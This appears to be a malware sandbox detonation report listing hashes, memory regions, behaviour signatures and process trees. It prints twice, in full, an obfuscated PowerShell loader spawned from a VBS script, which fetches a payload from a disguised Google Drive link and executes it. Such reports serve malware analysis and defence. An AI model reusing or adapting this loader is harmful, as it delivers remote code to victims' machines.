| SHA1 | b58f1fae7aeb4f69389a46d62fb110c5bf0b39a2 |
| SHA256 | f87d719b62b1b6a582ae647b47dcb70855495c65307cc786ebaf1580a7f1628e |
| SHA512 | f386755db46e2454711107f92c6ebc47dbfb50d047ddc296304703223928f5a1e8a6156e05e1544e2fd9b07cf63a5fdf54a16ce3010f650670c828f8ee4d37dc |
memory/1484-351-0x00000000025D0000-0x0000000002650000-memory.dmp
memory/1936-352-0x00000000026D0000-0x0000000002710000-memory.dmp
memory/1936-353-0x0000000005CF0000-0x0000000005DF0000-memory.dmp
memory/1936-354-0x0000000073240000-0x00000000737EB000-memory.dmp
memory/1936-355-0x0000000073240000-0x00000000737EB000-memory.dmp
memory/1936-358-0x0000000004FF0000-0x0000000004FF1000-memory.dmp
memory/1936-357-0x00000000026D0000-0x0000000002710000-memory.dmp
memory/1936-359-0x0000000006250000-0x0000000008AEF000-memory.dmp
memory/1936-360-0x00000000026D0000-0x0000000002710000-memory.dmp
memory/1936-361-0x0000000006250000-0x0000000008AEF000-memory.dmp
memory/1936-363-0x0000000005CF0000-0x0000000005DF0000-memory.dmp
memory/1936-364-0x00000000773A0000-0x0000000077549000-memory.dmp
memory/1936-365-0x0000000077590000-0x0000000077666000-memory.dmp
memory/1936-366-0x0000000006250000-0x0000000008AEF000-memory.dmp
memory/2844-367-0x0000000000590000-0x0000000002E2F000-memory.dmp
memory/2844-368-0x00000000773A0000-0x0000000077549000-memory.dmp
memory/2844-369-0x0000000077590000-0x0000000077666000-memory.dmp
memory/2844-370-0x00000000775C6000-0x00000000775C7000-memory.dmp
memory/2844-371-0x0000000000590000-0x0000000002E2F000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8241b5fbc274c4b283a157a0119346f6 |
| SHA1 | 4a2d77cbb738bb94b5e65a031dfc4a674e8fd48e |
| SHA256 | 73c7d8f0e25e72d592e4d230556d82accab1d073f3960fe04cdbbee823fb3ad4 |
| SHA512 | b2fb2e1dceedc016caa69310289ba7428b67c3c798b0d5fa4731a86da4feeebd2d071831babeb6fbedbbf1d97e8fe23ac54e79a6da2d302937dee1cc4051c058 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
memory/2844-395-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-397-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-398-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-400-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-401-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-402-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-396-0x0000000000590000-0x0000000002E2F000-memory.dmp
memory/2844-399-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-403-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-404-0x0000000000400000-0x0000000000581000-memory.dmp
memory/1936-406-0x0000000073240000-0x00000000737EB000-memory.dmp
memory/2844-405-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-407-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-408-0x0000000000400000-0x0000000000581000-memory.dmp
memory/1936-409-0x0000000006250000-0x0000000008AEF000-memory.dmp
memory/1484-422-0x000007FEF5790000-0x000007FEF612D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-330940541-141609230-1670313778-1000\0f5007522459c86e95ffcc62f32308f1_4456596e-0528-4680-8940-5edc26c0ff50
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
memory/2844-433-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-434-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-435-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-436-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-437-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-438-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2844-439-0x0000000000400000-0x0000000000581000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-330940541-141609230-1670313778-1000\0f5007522459c86e95ffcc62f32308f1_4456596e-0528-4680-8940-5edc26c0ff50
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-19 13:44
Reported
2024-04-19 13:47
Platform
win10v2004-20240412-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4876 -ip 4876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 2392
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
